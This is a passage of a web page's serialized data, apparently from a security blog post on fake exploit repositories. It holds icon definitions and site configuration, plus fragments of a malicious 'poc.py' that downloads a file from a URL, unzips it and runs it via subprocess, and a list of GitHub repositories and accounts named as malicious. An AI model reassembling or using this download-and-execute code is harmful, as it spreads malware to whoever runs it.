0-4Z\"\u002F\u003E"},"material-symbols:breaking-news-alt-1":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M6 17h5v-2H6v2Zm10 0h2v-2h-2v2ZM6 13h5v-2H6v2Zm10 0h2V7h-2v6ZM6 9h5V7H6v2ZM4 21q-.825 0-1.413-.588T2 19V5q0-.825.588-1.413T4 3h16q.825 0 1.413.588T22 5v14q0 .825-.588 1.413T20 21H4Z\"\u002F\u003E"},"mdi:newspaper-variant-outline":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M20 5v14H4V5h16m0-2H4c-1.11 0-2 .89-2 2v14c0 1.11.89 2 2 2h16c1.11 0 2-.89 2-2V5c0-1.11-.89-2-2-2m-2 12H6v2h12v-2m-8-8H6v6h4V7m2 2h6V7h-6v2m6 2h-6v2h6v-2Z\"\u002F\u003E"},"material-symbols:newspaper":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M4 21q-.825 0-1.413-.588T2 19V3l1.675 1.675L5.325 3L7 4.675L8.675 3l1.65 1.675L12 3l1.675 1.675L15.325 3L17 4.675L18.675 3l1.65 1.675L22 3v16q0 .825-.587 1.413T20 21H4Zm0-2h7v-6H4v6Zm9 0h7v-2h-7v2Zm0-4h7v-2h-7v2Zm-9-4h16V8H4v3Z\"\u002F\u003E"},"ic:baseline-event-note":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M17 10H7v2h10v-2zm2-7h-1V1h-2v2H8V1H6v2H5c-1.11 0-1.99.9-1.99 2L3 19a2 2 0 0 0 2 2h14c1.1 0 2-.9 2-2V5c0-1.1-.9-2-2-2zm0 16H5V8h14v11zm-5-5H7v2h7v-2z\"\u002F\u003E"},"mdi:document":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath d=\"M5 3h14a2 2 0 0 1 2 2v14a2 2 0 0 1-2 2H5a2 2 0 0 1-2-2V5a2 2 0 0 1 2-2zm2 4v2h10V7H7zm0 4v2h10v-2H7zm0 4v2h7v-2H7z\" fill=\"currentColor\"\u002F\u003E",hidden:O},"mdi:code-json":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M5 3h2v2H5v5a2 2 0 0 1-2 2a2 2 0 0 1 2 2v5h2v2H5c-1.07-.27-2-.9-2-2v-4a2 2 0 0 0-2-2H0v-2h1a2 2 0 0 0 2-2V5a2 2 0 0 1 2-2m14 0a2 2 0 0 1 2 2v4a2 2 0 0 0 2 2h1v2h-1a2 2 0 0 0-2 2v4a2 2 0 0 1-2 2h-2v-2h2v-5a2 2 0 0 1 2-2a2 2 0 0 1-2-2V5h-2V3h2m-7 12a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1m-4 
0a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1m8 0a1 1 0 0 1 1 1a1 1 0 0 1-1 1a1 1 0 0 1-1-1a1 1 0 0 1 1-1Z\"\u002F\u003E"},"ic:baseline-menu-book":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M21 5c-1.11-.35-2.33-.5-3.5-.5c-1.95 0-4.05.4-5.5 1.5c-1.45-1.1-3.55-1.5-5.5-1.5S2.45 4.9 1 6v14.65c0 .25.25.5.5.5c.1 0 .15-.05.25-.05C3.1 20.45 5.05 20 6.5 20c1.95 0 4.05.4 5.5 1.5c1.35-.85 3.8-1.5 5.5-1.5c1.65 0 3.35.3 4.75 1.05c.1.05.15.05.25.05c.25 0 .5-.25.5-.5V6c-.6-.45-1.25-.75-2-1zm0 13.5c-1.1-.35-2.3-.5-3.5-.5c-1.7 0-4.15.65-5.5 1.5V8c1.35-.85 3.8-1.5 5.5-1.5c1.2 0 2.4.15 3.5.5v11.5z\"\u002F\u003E\u003Cpath fill=\"currentColor\" d=\"M17.5 10.5c.88 0 1.73.09 2.5.26V9.24c-.79-.15-1.64-.24-2.5-.24c-1.7 0-3.24.29-4.5.83v1.66c1.13-.64 2.7-.99 4.5-.99zM13 12.49v1.66c1.13-.64 2.7-.99 4.5-.99c.88 0 1.73.09 2.5.26V11.9c-.79-.15-1.64-.24-2.5-.24c-1.7 0-3.24.3-4.5.83zm4.5 1.84c-1.7 0-3.24.29-4.5.83v1.66c1.13-.64 2.7-.99 4.5-.99c.88 0 1.73.09 2.5.26v-1.52c-.79-.16-1.64-.24-2.5-.24z\"\u002F\u003E"},"ic:round-support":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10s10-4.48 10-10S17.52 2 12 2zm7.46 7.12l-2.78 1.15a4.982 4.982 0 0 0-2.95-2.94l1.15-2.78c2.1.8 3.77 2.47 4.58 4.57zM12 15c-1.66 0-3-1.34-3-3s1.34-3 3-3s3 1.34 3 3s-1.34 3-3 3zM9.13 4.54l1.17 2.78a5 5 0 0 0-2.98 2.97L4.54 9.13a7.984 7.984 0 0 1 4.59-4.59zM4.54 14.87l2.78-1.15a4.968 4.968 0 0 0 2.97 2.96l-1.17 2.78a7.996 7.996 0 0 1-4.58-4.59zm10.34 4.59l-1.15-2.78a4.978 4.978 0 0 0 2.95-2.97l2.78 1.17a8.007 8.007 0 0 1-4.58 4.58z\"\u002F\u003E"},"mdi:chemical-weapon":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M11 7.83A3 3 0 0 1 9 5a3 3 0 0 1 3-3a3 3 0 0 1 3 3c0 1.31-.84 2.42-2 2.83v2.81a3.66 3.66 0 0 0-2 0V7.83m7.3 13.27a2.989 2.989 0 0 1-1.46-3.14l-2.44-1.41c.48-.46.84-1.05 1-1.73l2.44 1.41c.94-.81 2.32-.97 
3.45-.32c1.44.83 1.93 2.66 1.1 4.09a2.987 2.987 0 0 1-4.09 1.1M2.7 15.9c1.13-.65 2.51-.48 3.45.32l2.45-1.41c.16.69.51 1.27 1 1.73l-2.45 1.41c.23 1.22-.32 2.5-1.45 3.15c-1.44.83-3.27.34-4.1-1.1a2.999 2.999 0 0 1 1.1-4.1M14 14a2 2 0 0 1-2 2a2 2 0 0 1-2-2a2 2 0 0 1 2-2a2 2 0 0 1 2 2m3 0l-.03.57l-1.47-.86c-.1-1.07-.67-2-1.5-2.59V9.41c1.77.78 3 2.54 3 4.59m-2.03 4.03c-.83.61-1.86.97-2.97.97s-2.14-.36-2.97-1l1.47-.83c.46.21.97.33 1.5.33s1.03-.12 1.5-.33l1.47.86m-7.94-3.47L7 14c0-2.05 1.23-3.81 3-4.58v1.71c-.83.58-1.4 1.51-1.5 2.57l-1.47.86Z\"\u002F\u003E"},"grommet-icons:vulnerability":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"none\" stroke=\"currentColor\" stroke-width=\"2\" d=\"M12 0v24V0ZM0 12h24H0Zm17 0c0-2.757-2.243-5-5-5s-5 2.243-5 5s2.243 5 5 5s5-2.243 5-5Zm-5 9c-4.962 0-9-4.037-9-9s4.038-9 9-9s9 4.037 9 9s-4.038 9-9 9Z\"\u002F\u003E"},"material-symbols:add-moderator-rounded":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M16.5 17.5v2q0 .2.15.35T17 20q.2 0 .35-.15t.15-.35v-2h2q.2 0 .35-.15T20 17q0-.2-.15-.35t-.35-.15h-2v-2q0-.2-.15-.35T17 14q-.2 0-.35.15t-.15.35v2h-2q-.2 0-.35.15T14 17q0 .2.15.35t.35.15h2ZM17 22q-2.075 0-3.538-1.463T12 17q0-2.075 1.463-3.538T17 12q2.075 0 3.538 1.463T22 17q0 2.075-1.463 3.538T17 22Zm-5 0q-3.475-.875-5.738-3.988T4 11.1V6.375q0-.625.363-1.125t.937-.725l6-2.25q.35-.125.7-.125t.7.125l6 2.25q.575.225.938.725T20 6.375v4.3q-.65-.325-1.463-.5T17 10q-2.9 0-4.95 2.05T10 17q0 1.55.588 2.8t1.487 2.175q-.025 0-.037.013T12 22Z\"\u002F\u003E"},"carbon:vpn-policy":{left:e,top:e,width:z,height:z,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M30 15a6 6 0 1 0-10 4.46V29l4-1.884L28 29v-9.54A5.98 5.98 0 0 0 30 15Zm-4 10.848l-2-.942l-2 .942V20.65a5.888 5.888 0 0 0 4 0ZM24 19a4 4 0 1 1 4-4a4.005 4.005 0 0 1-4 4Z\"\u002F\u003E\u003Cpath fill=\"currentColor\" d=\"M14 2a6.007 6.007 0 0 0-6 6v6H6a2.002 2.002 0 0 0-2 2v12a2.002 2.002 0 0 0 2 
2h11v-2H6V16h9v-2h-5V8a4 4 0 0 1 7.92-.8l1.96-.4A6.017 6.017 0 0 0 14 2Z\"\u002F\u003E"},"carbon:policy":{left:e,top:e,width:z,height:z,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M30 18a6 6 0 1 0-10 4.46V30l4-1.893L28 30v-7.54A5.98 5.98 0 0 0 30 18zm-4 8.84l-2-.947l-2 .947v-3.19a5.888 5.888 0 0 0 4 0zM24 22a4 4 0 1 1 4-4a4.005 4.005 0 0 1-4 4zM9 14h7v2H9zm0-6h10v2H9z\"\u002F\u003E\u003Cpath fill=\"currentColor\" d=\"M6 30a2.002 2.002 0 0 1-2-2V4a2.002 2.002 0 0 1 2-2h16a2.002 2.002 0 0 1 2 2v4h-2V4H6v24h10v2Z\"\u002F\u003E"},"icon-park-outline:agreement":{left:e,top:e,width:aK,height:aK,rotate:e,vFlip:f,hFlip:f,body:"\u003Cg fill=\"none\" stroke=\"currentColor\" stroke-linecap=\"round\" stroke-width=\"4\"\u003E\u003Crect width=\"32\" height=\"40\" x=\"8\" y=\"4\" stroke-linejoin=\"round\" rx=\"2\"\u002F\u003E\u003Cpath stroke-linejoin=\"round\" d=\"M16 4h9v16l-4.5-4l-4.5 4V4Z\"\u002F\u003E\u003Cpath d=\"M16 28h10m-10 6h16\"\u002F\u003E\u003C\u002Fg\u003E"},"mdi:chevron-left":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"M15.41 16.58L10.83 12l4.58-4.59L14 6l-6 6l6 6l1.41-1.42Z\"\u002F\u003E"},"mdi:check-bold":{left:e,top:e,width:i,height:i,rotate:e,vFlip:f,hFlip:f,body:"\u003Cpath fill=\"currentColor\" d=\"m9 20.42l-6.21-6.21l2.83-2.83L9 14.77l9.88-9.89l2.83 2.83L9 
20.42Z\"\u002F\u003E"}}},_errors:{"content-query-C5tE1t07Tq":null},serverRendered:O,config:{public:{webURL:"https:\u002F\u002Fvulncheck.com",apiURL:"https:\u002F\u002Fapi.vulncheck.com",appEnv:"production",content:{locales:[],defaultLocale:r,integrity:1687646805393,experimental:{stripQueryParameters:f,clientDB:f},api:{baseURL:"\u002Fapi\u002F_content"},navigation:{fields:[]},tags:{p:"prose-p",a:"prose-a",blockquote:"prose-blockquote","code-inline":"prose-code-inline",code:"prose-code",em:"prose-em",h1:"prose-h1",h2:"prose-h2",h3:"prose-h3",h4:"prose-h4",h5:"prose-h5",h6:"prose-h6",hr:"prose-hr",img:"prose-img",ul:"prose-ul",ol:"prose-ol",li:"prose-li",strong:"prose-strong",table:"prose-table",thead:"prose-thead",tbody:"prose-tbody",td:"prose-td",th:"prose-th",tr:"prose-tr"},highlight:{preload:[T,"c","xml","java","php"],theme:{default:"github-light",dark:"github-dark",sepia:"monokai"}},wsUrl:r,documentDriven:f,host:r,trailingSlash:f,anchorLinks:{depth:X,exclude:[U]}}},app:{baseURL:"\u002F",buildAssetsDir:"\u002F_nuxt\u002F",cdnURL:r}}}}("element","text","span","ct-836158",0,false,"ct-794887","ct-169668",24,"line"," ","a","nofollow","li","=","p","+","","ct-360247","\"\u002Fhome\u002F\""," os.environ[","\"USERNAME\"","] ","\"\u002F.local\u002Fshare\"",":\n",32,"img","code-inline","if",3,"'TMP'",")\n","ct-402719",2,"        ","            ","\n",", ","h3","ol",true,"blog","Repo Layout","poc.py","code","python",1,"==","    ",4,"not","], name, name ","\".exe\"","with","ct-363298","open","(des, ","'wb'",") ","as"," f: f.write(urllib.request.urlopen(url).read())\n"," ZipFile(des, ","'r'","|","subprocess.","github-accounts","GitHub 
Accounts","https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS","https:\u002F\u002Fgithub.com\u002FRShahHSCS","https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS","https:\u002F\u002Fgithub.com\u002FDLandonHSCS","https:\u002F\u002Fgithub.com\u002FMHadzicHSCS","https:\u002F\u002Fgithub.com\u002FGSandersonHSCS","https:\u002F\u002Fgithub.com\u002FSSankkarHSCS","malicious-repositories","Malicious Repositories","https:\u002F\u002Fgithub.com\u002FAKuzmanHSCS\u002FMicrosoft-Exchange-RCE","https:\u002F\u002Fgithub.com\u002FMHadzicHSCS\u002FChrome-0-day","https:\u002F\u002Fgithub.com\u002FGSandersonHSCS\u002Fdiscord-0-day-fix","https:\u002F\u002Fgithub.com\u002FBAdithyaHSCS\u002FExchange-0-Day","https:\u002F\u002Fgithub.com\u002FRShahHSCS\u002FDiscord-0-Day-Exploit","https:\u002F\u002Fgithub.com\u002FDLandonHSCS\u002FDiscord-RCE","https:\u002F\u002Fgithub.com\u002FSSankkarHSCS\u002FChromium-0-Day","twitter-accounts","Twitter Accounts","https:\u002F\u002Ftwitter.com\u002FAKuzmanHSCS","https:\u002F\u002Ftwitter.com\u002FDLandonHSCS","https:\u002F\u002Ftwitter.com\u002FGSandersonHSCS","https:\u002F\u002Ftwitter.com\u002FMHadzicHSCS","system",48))</script><script type="module" src="/_nuxt/entry.cda04c5a.js" crossorigin></script></body>
</html>